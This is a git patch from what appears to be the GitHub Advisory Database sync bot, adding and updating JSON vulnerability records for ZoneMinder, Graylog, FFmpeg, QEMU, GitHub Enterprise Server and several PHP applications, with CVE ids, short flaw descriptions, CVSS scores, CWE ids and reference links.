"modified": "2026-02-18T18:30:39Z", + "published": "2026-02-18T18:30:39Z", + "aliases": [ + "CVE-2025-65791" + ], + "details": "ZoneMinder v1.36.34 is vulnerable to Command Injection in web/views/image.php. The application passes unsanitized user input directly to the exec() function.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-65791" + }, + { + "type": "WEB", + "url": "https://github.com/rishavand1/CVE-2025-65791" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-78" + ], + "severity": "CRITICAL", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-18T16:22:29Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-xw8j-p597-rjrj/GHSA-xw8j-p597-rjrj.json b/advisories/unreviewed/2026/02/GHSA-xw8j-p597-rjrj/GHSA-xw8j-p597-rjrj.json index 767d768b5a160..ee81c183161eb 100644 --- a/advisories/unreviewed/2026/02/GHSA-xw8j-p597-rjrj/GHSA-xw8j-p597-rjrj.json +++ b/advisories/unreviewed/2026/02/GHSA-xw8j-p597-rjrj/GHSA-xw8j-p597-rjrj.json @@ -41,7 +41,9 @@ } ], "database_specific": { - "cwe_ids": [], + "cwe_ids": [ + "CWE-200" + ], "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, From 67ec8ed983718a3116435faf90f0d11455deef3b Mon Sep 17 00:00:00 2001 From: "advisory-database[bot]" <45398580+advisory-database[bot]@users.noreply.github.com> Date: Wed, 18 Feb 2026 21:32:49 +0000 Subject: [PATCH 015/174] Advisory Database Sync --- .../GHSA-v6c5-9mp4-mwq4.json | 6 +- .../GHSA-4cjv-rrcw-xg72.json | 3 +- .../GHSA-6979-fg32-9gg4.json | 3 +- .../GHSA-7p75-39p6-7499.json | 3 +- .../GHSA-rhph-mcqr-9p2p.json | 1 + .../GHSA-27xm-cj78-cxmr.json | 2 +- .../GHSA-2g52-f4rf-8vm9.json | 40 +++++++++++++ .../GHSA-2hcf-jfqx-g286.json | 40 +++++++++++++ .../GHSA-2q3j-wj77-9934.json | 56 +++++++++++++++++ .../GHSA-3crm-x896-j73p.json | 6 +- .../GHSA-43wm-f3cq-hfrw.json | 3 +- .../GHSA-47m2-7g75-xvrp.json | 6 +- .../GHSA-49xw-73mm-8fw9.json | 6 +- .../GHSA-4pq4-6gr5-cr69.json | 40 +++++++++++++ .../GHSA-55vh-w3p8-qq9g.json | 15 +++-- .../GHSA-5hp8-hwcv-h225.json | 6 +- .../GHSA-5pqm-c33h-22jc.json | 15 +++-- .../GHSA-62j7-j842-x6r6.json | 6 +- .../GHSA-7qhw-4fcq-2g37.json | 40 +++++++++++++ .../GHSA-844q-r72x-vfmv.json | 3 +- .../GHSA-86c5-9jxx-m8g7.json | 3 +- .../GHSA-8gfj-223w-87pr.json | 40 +++++++++++++ .../GHSA-8rqj-9226-cwx7.json | 15 +++-- .../GHSA-9f49-2j27-6f79.json | 44 ++++++++++++++ .../GHSA-9hwv-m488-9fjx.json | 3 +- .../GHSA-c96q-rf2r-2xj8.json | 48 +++++++++++++++ .../GHSA-cf26-rj67-f4wr.json | 6 +- .../GHSA-cq5p-w4x6-m6h3.json | 60 +++++++++++++++++++ .../GHSA-cw7v-qx8m-563q.json | 6 +- .../GHSA-ff7j-jwgr-hgxp.json | 6 +- .../GHSA-gq25-pccv-6q8j.json | 40 +++++++++++++ .../GHSA-gwrh-w4f9-ffc9.json | 60 +++++++++++++++++++ .../GHSA-h5jq-923c-7w8g.json | 40 +++++++++++++ .../GHSA-hcrc-x9p4-f9jh.json | 4 +- .../GHSA-jx8h-vrjj-cm6g.json | 52 ++++++++++++++++ .../GHSA-m4v3-95xp-3j5h.json | 15 +++-- .../GHSA-mjjq-x58m-rfxp.json | 60 +++++++++++++++++++ .../GHSA-p546-7whm-cxpm.json | 56 +++++++++++++++++ .../GHSA-pppv-pc54-6j8r.json | 56 +++++++++++++++++ .../GHSA-qrj7-4954-7p6v.json | 44 ++++++++++++++ .../GHSA-qxf4-rqx4-9mqj.json | 1 + .../GHSA-r9wp-qq53-qvjx.json | 56 +++++++++++++++++ .../GHSA-rcjr-qg8v-4c3v.json | 40 +++++++++++++ .../GHSA-rwf8-6fj2-4vrx.json | 48 +++++++++++++++ .../GHSA-v3v9-r7ff-976x.json | 15 +++-- .../GHSA-vmr8-g4h2-2x5j.json | 52 ++++++++++++++++ .../GHSA-wjf9-j9vw-27f4.json | 40 +++++++++++++ .../GHSA-wrqv-g27w-82rr.json | 3 +- .../GHSA-xj75-gfvf-4g86.json | 42 +++++++++++++ .../GHSA-xjrj-8prq-9366.json | 3 +- .../GHSA-xqcm-jrw9-wq72.json | 14 ++++- .../GHSA-xrj7-v4x4-74hr.json | 40 +++++++++++++ 52 files changed, 1271 insertions(+), 41 deletions(-) create mode 100644 advisories/unreviewed/2026/02/GHSA-2g52-f4rf-8vm9/GHSA-2g52-f4rf-8vm9.json create mode 100644 advisories/unreviewed/2026/02/GHSA-2hcf-jfqx-g286/GHSA-2hcf-jfqx-g286.json create mode 100644 advisories/unreviewed/2026/02/GHSA-2q3j-wj77-9934/GHSA-2q3j-wj77-9934.json create mode 100644 advisories/unreviewed/2026/02/GHSA-4pq4-6gr5-cr69/GHSA-4pq4-6gr5-cr69.json create mode 100644 advisories/unreviewed/2026/02/GHSA-7qhw-4fcq-2g37/GHSA-7qhw-4fcq-2g37.json create mode 100644 advisories/unreviewed/2026/02/GHSA-8gfj-223w-87pr/GHSA-8gfj-223w-87pr.json create mode 100644 advisories/unreviewed/2026/02/GHSA-9f49-2j27-6f79/GHSA-9f49-2j27-6f79.json create mode 100644 advisories/unreviewed/2026/02/GHSA-c96q-rf2r-2xj8/GHSA-c96q-rf2r-2xj8.json create mode 100644 advisories/unreviewed/2026/02/GHSA-cq5p-w4x6-m6h3/GHSA-cq5p-w4x6-m6h3.json create mode 100644 advisories/unreviewed/2026/02/GHSA-gq25-pccv-6q8j/GHSA-gq25-pccv-6q8j.json create mode 100644 advisories/unreviewed/2026/02/GHSA-gwrh-w4f9-ffc9/GHSA-gwrh-w4f9-ffc9.json create mode 100644 advisories/unreviewed/2026/02/GHSA-h5jq-923c-7w8g/GHSA-h5jq-923c-7w8g.json create mode 100644 advisories/unreviewed/2026/02/GHSA-jx8h-vrjj-cm6g/GHSA-jx8h-vrjj-cm6g.json create mode 100644 advisories/unreviewed/2026/02/GHSA-mjjq-x58m-rfxp/GHSA-mjjq-x58m-rfxp.json create mode 100644 advisories/unreviewed/2026/02/GHSA-p546-7whm-cxpm/GHSA-p546-7whm-cxpm.json create mode 100644 advisories/unreviewed/2026/02/GHSA-pppv-pc54-6j8r/GHSA-pppv-pc54-6j8r.json create mode 100644 advisories/unreviewed/2026/02/GHSA-qrj7-4954-7p6v/GHSA-qrj7-4954-7p6v.json create mode 100644 advisories/unreviewed/2026/02/GHSA-r9wp-qq53-qvjx/GHSA-r9wp-qq53-qvjx.json create mode 100644 advisories/unreviewed/2026/02/GHSA-rcjr-qg8v-4c3v/GHSA-rcjr-qg8v-4c3v.json create mode 100644 advisories/unreviewed/2026/02/GHSA-rwf8-6fj2-4vrx/GHSA-rwf8-6fj2-4vrx.json create mode 100644 advisories/unreviewed/2026/02/GHSA-vmr8-g4h2-2x5j/GHSA-vmr8-g4h2-2x5j.json create mode 100644 advisories/unreviewed/2026/02/GHSA-wjf9-j9vw-27f4/GHSA-wjf9-j9vw-27f4.json create mode 100644 advisories/unreviewed/2026/02/GHSA-xj75-gfvf-4g86/GHSA-xj75-gfvf-4g86.json create mode 100644 advisories/unreviewed/2026/02/GHSA-xrj7-v4x4-74hr/GHSA-xrj7-v4x4-74hr.json diff --git a/advisories/unreviewed/2025/11/GHSA-v6c5-9mp4-mwq4/GHSA-v6c5-9mp4-mwq4.json b/advisories/unreviewed/2025/11/GHSA-v6c5-9mp4-mwq4/GHSA-v6c5-9mp4-mwq4.json index c8e47565d98ec..56a5e5890824d 100644 --- a/advisories/unreviewed/2025/11/GHSA-v6c5-9mp4-mwq4/GHSA-v6c5-9mp4-mwq4.json +++ b/advisories/unreviewed/2025/11/GHSA-v6c5-9mp4-mwq4/GHSA-v6c5-9mp4-mwq4.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-v6c5-9mp4-mwq4", - "modified": "2026-02-13T18:31:23Z", + "modified": "2026-02-18T21:31:17Z", "published": "2025-11-26T15:34:12Z", "aliases": [ "CVE-2025-13601" @@ -35,6 +35,10 @@ "type": "WEB", "url": "https://access.redhat.com/security/cve/CVE-2025-13601" }, + { + "type": "WEB", + "url": "https://access.redhat.com/errata/RHSA-2026:2659" + }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2026:2563" diff --git a/advisories/unreviewed/2026/01/GHSA-4cjv-rrcw-xg72/GHSA-4cjv-rrcw-xg72.json b/advisories/unreviewed/2026/01/GHSA-4cjv-rrcw-xg72/GHSA-4cjv-rrcw-xg72.json index 215280ce9c12c..75af346fff00a 100644 --- a/advisories/unreviewed/2026/01/GHSA-4cjv-rrcw-xg72/GHSA-4cjv-rrcw-xg72.json +++ b/advisories/unreviewed/2026/01/GHSA-4cjv-rrcw-xg72/GHSA-4cjv-rrcw-xg72.json @@ -26,7 +26,8 @@ ], "database_specific": { "cwe_ids": [ - "CWE-122" + "CWE-122", + "CWE-787" ], "severity": "HIGH", "github_reviewed": false, diff --git a/advisories/unreviewed/2026/01/GHSA-6979-fg32-9gg4/GHSA-6979-fg32-9gg4.json b/advisories/unreviewed/2026/01/GHSA-6979-fg32-9gg4/GHSA-6979-fg32-9gg4.json index 0115e473402b6..9d94cb0d3493c 100644 --- a/advisories/unreviewed/2026/01/GHSA-6979-fg32-9gg4/GHSA-6979-fg32-9gg4.json +++ b/advisories/unreviewed/2026/01/GHSA-6979-fg32-9gg4/GHSA-6979-fg32-9gg4.json @@ -26,7 +26,8 @@ ], "database_specific": { "cwe_ids": [ - "CWE-121" + "CWE-121", + "CWE-787" ], "severity": "HIGH", "github_reviewed": false, diff --git a/advisories/unreviewed/2026/01/GHSA-7p75-39p6-7499/GHSA-7p75-39p6-7499.json b/advisories/unreviewed/2026/01/GHSA-7p75-39p6-7499/GHSA-7p75-39p6-7499.json index f87321f79bee0..629cf6777cc15 100644 --- a/advisories/unreviewed/2026/01/GHSA-7p75-39p6-7499/GHSA-7p75-39p6-7499.json +++ b/advisories/unreviewed/2026/01/GHSA-7p75-39p6-7499/GHSA-7p75-39p6-7499.json @@ -26,7 +26,8 @@ ], "database_specific": { "cwe_ids": [ - "CWE-121" + "CWE-121", + "CWE-787" ], "severity": "HIGH", "github_reviewed": false, diff --git a/advisories/unreviewed/2026/01/GHSA-rhph-mcqr-9p2p/GHSA-rhph-mcqr-9p2p.json b/advisories/unreviewed/2026/01/GHSA-rhph-mcqr-9p2p/GHSA-rhph-mcqr-9p2p.json index af5bba60417e6..751a2a7b29967 100644 --- a/advisories/unreviewed/2026/01/GHSA-rhph-mcqr-9p2p/GHSA-rhph-mcqr-9p2p.json +++ b/advisories/unreviewed/2026/01/GHSA-rhph-mcqr-9p2p/GHSA-rhph-mcqr-9p2p.json @@ -26,6 +26,7 @@ ], "database_specific": { "cwe_ids": [ + "CWE-77", "CWE-78" ], "severity": "HIGH", diff --git a/advisories/unreviewed/2026/02/GHSA-27xm-cj78-cxmr/GHSA-27xm-cj78-cxmr.json b/advisories/unreviewed/2026/02/GHSA-27xm-cj78-cxmr/GHSA-27xm-cj78-cxmr.json index b935b4bfd83c9..2284419712e9a 100644 --- a/advisories/unreviewed/2026/02/GHSA-27xm-cj78-cxmr/GHSA-27xm-cj78-cxmr.json +++ b/advisories/unreviewed/2026/02/GHSA-27xm-cj78-cxmr/GHSA-27xm-cj78-cxmr.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-27xm-cj78-cxmr", - "modified": "2026-02-17T18:32:58Z", + "modified": "2026-02-18T21:31:22Z", "published": "2026-02-17T18:32:57Z", "aliases": [ "CVE-2025-13867" diff --git a/advisories/unreviewed/2026/02/GHSA-2g52-f4rf-8vm9/GHSA-2g52-f4rf-8vm9.json b/advisories/unreviewed/2026/02/GHSA-2g52-f4rf-8vm9/GHSA-2g52-f4rf-8vm9.json new file mode 100644 index 0000000000000..1eed2d623eb85 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-2g52-f4rf-8vm9/GHSA-2g52-f4rf-8vm9.json @@ -0,0 +1,40 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-2g52-f4rf-8vm9", + "modified": "2026-02-18T21:31:23Z", + "published": "2026-02-18T21:31:23Z", + "aliases": [ + "CVE-2025-12343" + ], + "details": "A flaw was found in FFmpeg’s TensorFlow backend within the libavfilter/dnn_backend_tf.c source file. The issue occurs in the dnn_execute_model_tf() function, where a task object is freed multiple times in certain error-handling paths. This redundant memory deallocation can lead to a double-free condition, potentially causing FFmpeg or any application using it to crash when processing TensorFlow-based DNN models. This results in a denial-of-service scenario but does not allow arbitrary code execution under normal conditions.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:L" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-12343" + }, + { + "type": "WEB", + "url": "https://access.redhat.com/security/cve/CVE-2025-12343" + }, + { + "type": "WEB", + "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2406533" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-415" + ], + "severity": "LOW", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-18T21:16:20Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-2hcf-jfqx-g286/GHSA-2hcf-jfqx-g286.json b/advisories/unreviewed/2026/02/GHSA-2hcf-jfqx-g286/GHSA-2hcf-jfqx-g286.json new file mode 100644 index 0000000000000..1c2ea8ed72273 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-2hcf-jfqx-g286/GHSA-2hcf-jfqx-g286.json @@ -0,0 +1,40 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-2hcf-jfqx-g286", + "modified": "2026-02-18T21:31:22Z", + "published": "2026-02-18T21:31:22Z", + "aliases": [ + "CVE-2025-70062" + ], + "details": "PHPGurukul Hospital Management System v4.0 contains a Cross-Site Request Forgery (CSRF) vulnerability in the 'Add Doctor' module. The application fails to enforce CSRF token validation on the add-doctor.php endpoint. This allows remote attackers to create arbitrary Doctor accounts (privileged users) by tricking an authenticated administrator into visiting a malicious page.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-70062" + }, + { + "type": "WEB", + "url": "https://gist.github.com/Sanka1pp/78795abd84220e879ee0425159af5ae2" + }, + { + "type": "WEB", + "url": "https://packetstorm.news/files/id/213711" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-352" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-18T19:21:42Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-2q3j-wj77-9934/GHSA-2q3j-wj77-9934.json b/advisories/unreviewed/2026/02/GHSA-2q3j-wj77-9934/GHSA-2q3j-wj77-9934.json new file mode 100644 index 0000000000000..adb0dfcf2a0b1 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-2q3j-wj77-9934/GHSA-2q3j-wj77-9934.json @@ -0,0 +1,56 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-2q3j-wj77-9934", + "modified": "2026-02-18T21:31:23Z", + "published": "2026-02-18T21:31:23Z", + "aliases": [ + "CVE-2026-1355" + ], + "details": "A Missing Authorization vulnerability was identified in GitHub Enterprise Server that allowed an attacker to upload unauthorized content to another user’s repository migration export due to a missing authorization check in the repository migration upload endpoint. By supplying the migration identifier, an attacker could overwrite or replace a victim’s migration archive, potentially causing victims to download attacker-controlled repository data during migration restores or automated imports. An attacker would require authentication to the victim's GitHub Enterprise Server instance. This vulnerability affected all versions of GitHub Enterprise Server prior to 3.20 and was fixed in versions 3.19.2, 3.18.5, 3.17.11, 3.16.14, 3.15.18, 3.14.23. This vulnerability was reported via the GitHub Bug Bounty program.", + "severity": [ + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:L/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-1355" + }, + { + "type": "WEB", + "url": "https://docs.github.com/en/enterprise-server@3.14/admin/release-notes#3.14.23" + }, + { + "type": "WEB", + "url": "https://docs.github.com/en/enterprise-server@3.15/admin/release-notes#3.15.18" + }, + { + "type": "WEB", + "url": "https://docs.github.com/en/enterprise-server@3.16/admin/release-notes#3.16.14" + }, + { + "type": "WEB", + "url": "https://docs.github.com/en/enterprise-server@3.17/admin/release-notes#3.17.11" + }, + { + "type": "WEB", + "url": "https://docs.github.com/en/enterprise-server@3.18/admin/release-notes#3.18.5" + }, + { + "type": "WEB", + "url": "https://docs.github.com/en/enterprise-server@3.19/admin/release-notes#3.19.2" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-862" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-18T21:16:23Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-3crm-x896-j73p/GHSA-3crm-x896-j73p.json b/advisories/unreviewed/2026/02/GHSA-3crm-x896-j73p/GHSA-3crm-x896-j73p.json index f16f154739d21..aa98d74bfa7bd 100644 --- a/advisories/unreviewed/2026/02/GHSA-3crm-x896-j73p/GHSA-3crm-x896-j73p.json +++ b/advisories/unreviewed/2026/02/GHSA-3crm-x896-j73p/GHSA-3crm-x896-j73p.json @@ -1,13 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-3crm-x896-j73p", - "modified": "2026-02-18T15:31:26Z", + "modified": "2026-02-18T21:31:22Z", "published": "2026-02-18T15:31:26Z", "aliases": [ "CVE-2026-1435" ], "details": "Not properly invalidated session vulnerability in Graylog Web Interface, version 2.2.3, due to incorrect management of session invalidation after new logins. The application generates a new 'sessionId' each time a user authenticates, but does not invalidate previously issued session identifiers, which remain valid even after multiple consecutive logins by the same user. As a result, a stolen or leaked 'sessionId' can continue to be used to authenticate valid requests. Exploiting this vulnerability would allow an attacker with access to the web service/API network (port 9000 or HTTP/S endpoint of the server) to reuse an old session token to gain unauthorized access to the application, interact with the API/web, and compromise the integrity of the affected account.", "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" + }, { "type": "CVSS_V4", "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" diff --git a/advisories/unreviewed/2026/02/GHSA-43wm-f3cq-hfrw/GHSA-43wm-f3cq-hfrw.json b/advisories/unreviewed/2026/02/GHSA-43wm-f3cq-hfrw/GHSA-43wm-f3cq-hfrw.json index a1d78ed65635d..3794a50329c10 100644 --- a/advisories/unreviewed/2026/02/GHSA-43wm-f3cq-hfrw/GHSA-43wm-f3cq-hfrw.json +++ b/advisories/unreviewed/2026/02/GHSA-43wm-f3cq-hfrw/GHSA-43wm-f3cq-hfrw.json @@ -42,7 +42,8 @@ ], "database_specific": { "cwe_ids": [ - "CWE-74" + "CWE-74", + "CWE-77" ], "severity": "MODERATE", "github_reviewed": false, diff --git a/advisories/unreviewed/2026/02/GHSA-47m2-7g75-xvrp/GHSA-47m2-7g75-xvrp.json b/advisories/unreviewed/2026/02/GHSA-47m2-7g75-xvrp/GHSA-47m2-7g75-xvrp.json index 92410cc1fc832..67d9d020fc092 100644 --- a/advisories/unreviewed/2026/02/GHSA-47m2-7g75-xvrp/GHSA-47m2-7g75-xvrp.json +++ b/advisories/unreviewed/2026/02/GHSA-47m2-7g75-xvrp/GHSA-47m2-7g75-xvrp.json @@ -1,13 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-47m2-7g75-xvrp", - "modified": "2026-02-18T15:31:26Z", + "modified": "2026-02-18T21:31:22Z", "published": "2026-02-18T15:31:26Z", "aliases": [ "CVE-2026-1440" ], "details": "Reflected Cross-Site Scripting (XSS) vulnerability in the Graylog Web Interface console, version 2.2.3, caused by a lack of proper sanitization and escaping in HTML output. Several endpoints include segments of the URL directly in the response without applying output encoding, allowing an attacker to inject and execute arbitrary JavaScript code when a user visits a specially crafted URL. Exploitation of this vulnerability may allow script execution in the victim's browser and limited manipulation of the affected user's session context, through the  '/system/pipelines/' endpoint.", "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N" + }, { "type": "CVSS_V4", "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" diff --git a/advisories/unreviewed/2026/02/GHSA-49xw-73mm-8fw9/GHSA-49xw-73mm-8fw9.json b/advisories/unreviewed/2026/02/GHSA-49xw-73mm-8fw9/GHSA-49xw-73mm-8fw9.json index 3e7b6867826cb..14b4651484351 100644 --- a/advisories/unreviewed/2026/02/GHSA-49xw-73mm-8fw9/GHSA-49xw-73mm-8fw9.json +++ b/advisories/unreviewed/2026/02/GHSA-49xw-73mm-8fw9/GHSA-49xw-73mm-8fw9.json @@ -1,13 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-49xw-73mm-8fw9", - "modified": "2026-02-18T15:31:26Z", + "modified": "2026-02-18T21:31:22Z", "published": "2026-02-18T15:31:26Z", "aliases": [ "CVE-2026-1439" ], "details": "Reflected Cross-Site Scripting (XSS) vulnerability in the Graylog Web Interface console, version 2.2.3, caused by a lack of proper sanitization and escaping in HTML output. Several endpoints include segments of the URL directly in the response without applying output encoding, allowing an attacker to inject and execute arbitrary JavaScript code when a user visits a specially crafted URL. Exploitation of this vulnerability may allow script execution in the victim's browser and limited manipulation of the affected user's session context, through the  '/\n\nalerts\n\n/' endpoint.", "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N" + }, { "type": "CVSS_V4", "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" diff --git a/advisories/unreviewed/2026/02/GHSA-4pq4-6gr5-cr69/GHSA-4pq4-6gr5-cr69.json b/advisories/unreviewed/2026/02/GHSA-4pq4-6gr5-cr69/GHSA-4pq4-6gr5-cr69.json new file mode 100644 index 0000000000000..a1b59ad0595c4 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-4pq4-6gr5-cr69/GHSA-4pq4-6gr5-cr69.json @@ -0,0 +1,40 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-4pq4-6gr5-cr69", + "modified": "2026-02-18T21:31:23Z", + "published": "2026-02-18T21:31:23Z", + "aliases": [ + "CVE-2026-0665" + ], + "details": "An off-by-one error was found in QEMU's KVM Xen guest support. A malicious guest could use this flaw to trigger out-of-bounds heap accesses in the QEMU process via the emulated Xen physdev hypercall interface, leading to a denial of service or potential memory corruption.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:C/C:N/I:N/A:H" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-0665" + }, + { + "type": "WEB", + "url": "https://access.redhat.com/security/cve/CVE-2026-0665" + }, + { + "type": "WEB", + "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2428640" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-787" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-18T21:16:22Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-55vh-w3p8-qq9g/GHSA-55vh-w3p8-qq9g.json b/advisories/unreviewed/2026/02/GHSA-55vh-w3p8-qq9g/GHSA-55vh-w3p8-qq9g.json index 5f43ff3dcbfb9..da562ffae87ff 100644 --- a/advisories/unreviewed/2026/02/GHSA-55vh-w3p8-qq9g/GHSA-55vh-w3p8-qq9g.json +++ b/advisories/unreviewed/2026/02/GHSA-55vh-w3p8-qq9g/GHSA-55vh-w3p8-qq9g.json @@ -1,13 +1,18 @@ { "schema_version": "1.4.0", "id": "GHSA-55vh-w3p8-qq9g", - "modified": "2026-02-18T18:30:40Z", + "modified": "2026-02-18T21:31:22Z", "published": "2026-02-18T18:30:40Z", "aliases": [ "CVE-2025-70141" ], "details": "SourceCodester Customer Support System 1.0 contains an incorrect access control vulnerability in ajax.php. The AJAX dispatcher does not enforce authentication or authorization before invoking administrative methods in admin_class.php based on the action parameter. An unauthenticated remote attacker can perform sensitive operations such as creating customers and deleting users (including the admin account), as well as modifying or deleting other application records (tickets, departments, comments), resulting in unauthorized data modification.", - "severity": [], + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:H/A:H" + } + ], "affected": [], "references": [ { @@ -24,8 +29,10 @@ } ], "database_specific": { - "cwe_ids": [], - "severity": null, + "cwe_ids": [ + "CWE-306" + ], + "severity": "CRITICAL", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2026-02-18T17:21:35Z" diff --git a/advisories/unreviewed/2026/02/GHSA-5hp8-hwcv-h225/GHSA-5hp8-hwcv-h225.json b/advisories/unreviewed/2026/02/GHSA-5hp8-hwcv-h225/GHSA-5hp8-hwcv-h225.json index 57e5554fcf326..b3abdac0e1d53 100644 --- a/advisories/unreviewed/2026/02/GHSA-5hp8-hwcv-h225/GHSA-5hp8-hwcv-h225.json +++ b/advisories/unreviewed/2026/02/GHSA-5hp8-hwcv-h225/GHSA-5hp8-hwcv-h225.json @@ -1,13 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-5hp8-hwcv-h225", - "modified": "2026-02-18T15:31:26Z", + "modified": "2026-02-18T21:31:22Z", "published": "2026-02-18T15:31:26Z", "aliases": [ "CVE-2026-1437" ], "details": "Reflected Cross-Site Scripting (XSS) vulnerability in the Graylog Web Interface console, version 2.2.3, caused by a lack of proper sanitization and escaping in HTML output. Several endpoints include segments of the URL directly in the response without applying output encoding, allowing an attacker to inject and execute arbitrary JavaScript code when a user visits a specially crafted URL. Exploitation of this vulnerability may allow script execution in the victim's browser and limited manipulation of the affected user's session context, through the '/system/authentication/users/edit/' endpoint.", "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N" + }, { "type": "CVSS_V4", "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" diff --git a/advisories/unreviewed/2026/02/GHSA-5pqm-c33h-22jc/GHSA-5pqm-c33h-22jc.json b/advisories/unreviewed/2026/02/GHSA-5pqm-c33h-22jc/GHSA-5pqm-c33h-22jc.json index 89bf8cfaa988e..2a4bc316e8b57 100644 --- a/advisories/unreviewed/2026/02/GHSA-5pqm-c33h-22jc/GHSA-5pqm-c33h-22jc.json +++ b/advisories/unreviewed/2026/02/GHSA-5pqm-c33h-22jc/GHSA-5pqm-c33h-22jc.json @@ -1,13 +1,18 @@ { "schema_version": "1.4.0", "id": "GHSA-5pqm-c33h-22jc", - "modified": "2026-02-18T18:30:40Z", + "modified": "2026-02-18T21:31:22Z", "published": "2026-02-18T18:30:40Z", "aliases": [ "CVE-2025-70146" ], "details": "Missing authentication in multiple administrative action scripts under /admin/ in ProjectWorlds Online Time Table Generator 1.0 allows remote attackers to perform unauthorized administrative operations (e.g.,adding records, deleting records) via direct HTTP requests to affected endpoints without a valid session.", - "severity": [], + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H" + } + 